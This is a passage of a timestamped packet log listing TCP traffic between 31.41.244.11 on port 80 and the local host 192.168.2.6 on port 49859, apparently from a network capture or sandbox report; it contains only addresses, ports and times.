                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.261387110 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.261552095 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.264183044 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.264233112 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.264302015 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.264344931 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.267132998 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.267144918 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.267184973 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.269829035 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.269875050 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.270051003 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.270092010 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.273031950 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.273051023 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.273068905 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.273086071 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.275727034 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.275738955 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.275768042 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.275784016 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.278201103 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.278247118 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.278381109 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.278420925 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.281120062 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.281164885 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.281306028 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.281347036 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.286139965 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.286176920 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.287051916 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.287096024 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.287538052 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.287581921 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.287717104 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.287760019 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.290697098 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.290743113 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.290839911 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.290880919 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.293380022 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.293422937 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.293596029 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.293638945 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.295758963 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.295800924 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.295823097 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.295861006 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.298600912 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.298645020 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.298662901 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.298701048 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.301525116 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.301563978 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.301575899 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.301619053 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.304364920 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.304413080 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.304480076 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.304523945 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.307356119 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.307403088 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.307424068 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.307461023 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.310282946 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.310328007 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.310411930 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.310452938 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.313170910 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.313213110 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.313235044 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.313296080 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.425375938 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.425446033 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.425553083 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.425595999 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.426821947 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.426871061 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.426889896 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.426932096 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.428581953 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.428627968 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.428698063 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.428740978 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.431170940 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.431212902 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.431235075 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.431281090 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.433734894 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.433783054 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.433804989 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.433845043 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.436271906 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.436335087 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.436424971 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.436467886 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.438909054 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.438956976 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.438962936 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.438996077 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.441102028 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.441152096 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.441277027 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.441318989 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.443551064 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.443598986 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.443722963 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.443767071 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.445951939 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.445998907 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.446127892 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.446173906 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.448425055 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.448472023 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.448492050 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.448534012 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.450716972 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.450786114 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.450793028 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.450839996 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.453166962 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.453231096 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.453388929 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.453430891 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.455578089 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.455622911 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.455785990 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.455833912 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.457953930 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.457994938 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.458000898 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.458049059 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.458060026 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.460410118 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.460455894 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.460478067 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.460544109 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.462832928 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.462882042 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.462960005 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.463020086 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.465276957 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.465325117 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.465385914 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.465430021 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.467602015 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.467647076 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.467719078 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.467761993 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.470002890 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.470051050 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.470098972 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.470144987 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.472423077 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.472469091 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.472575903 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.472619057 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.474868059 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.474912882 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.474982023 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.475027084 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.477180004 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.477226019 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.477278948 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.477319956 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.479594946 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.479654074 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.479660988 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.479706049 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.481981993 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.482028008 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.482089996 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.482136011 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.484483004 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.484529972 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.484548092 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.484589100 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.487029076 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.487071991 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.487236977 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.487278938 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.489222050 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.489265919 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.489336014 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.489378929 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.491610050 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.491655111 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.491748095 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.491790056 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.494009972 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.494052887 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.494143963 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.494182110 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.496417046 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.496462107 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.496510029 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.496551991 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.498951912 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.499013901 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.499032974 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.499077082 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.501235008 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.501276970 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.501374960 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.501411915 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.503735065 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.503782988 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.503798008 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.503839016 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.506047964 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.506098032 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.506151915 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.506200075 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.508429050 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.508476973 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.508488894 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.508531094 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.510910034 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.510968924 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.511064053 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.511106968 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.513324976 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.513370037 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.513463020 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.513510942 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.515671015 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.515714884 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.515779972 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.515821934 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.518086910 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.518131971 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.518184900 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.518224955 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.520458937 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.520500898 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.520569086 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.520612001 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.522927046 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.522974014 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.522984982 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.523027897 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.525325060 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.525374889 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.525459051 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.525505066 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.527698994 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.527745008 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.527756929 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.527798891 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.530078888 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.530133009 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.530173063 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.530215025 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.532536983 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.532597065 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.532701969 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.532746077 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.534864902 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.534910917 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.535008907 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.535052061 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.537312984 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.537362099 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.537373066 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.537414074 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.540251017 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.540293932 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.540354967 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.540395975 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.542100906 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.542150021 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.542161942 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.542206049 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.544518948 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.544572115 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.544610023 CET804985931.41.244.11192.168.2.6
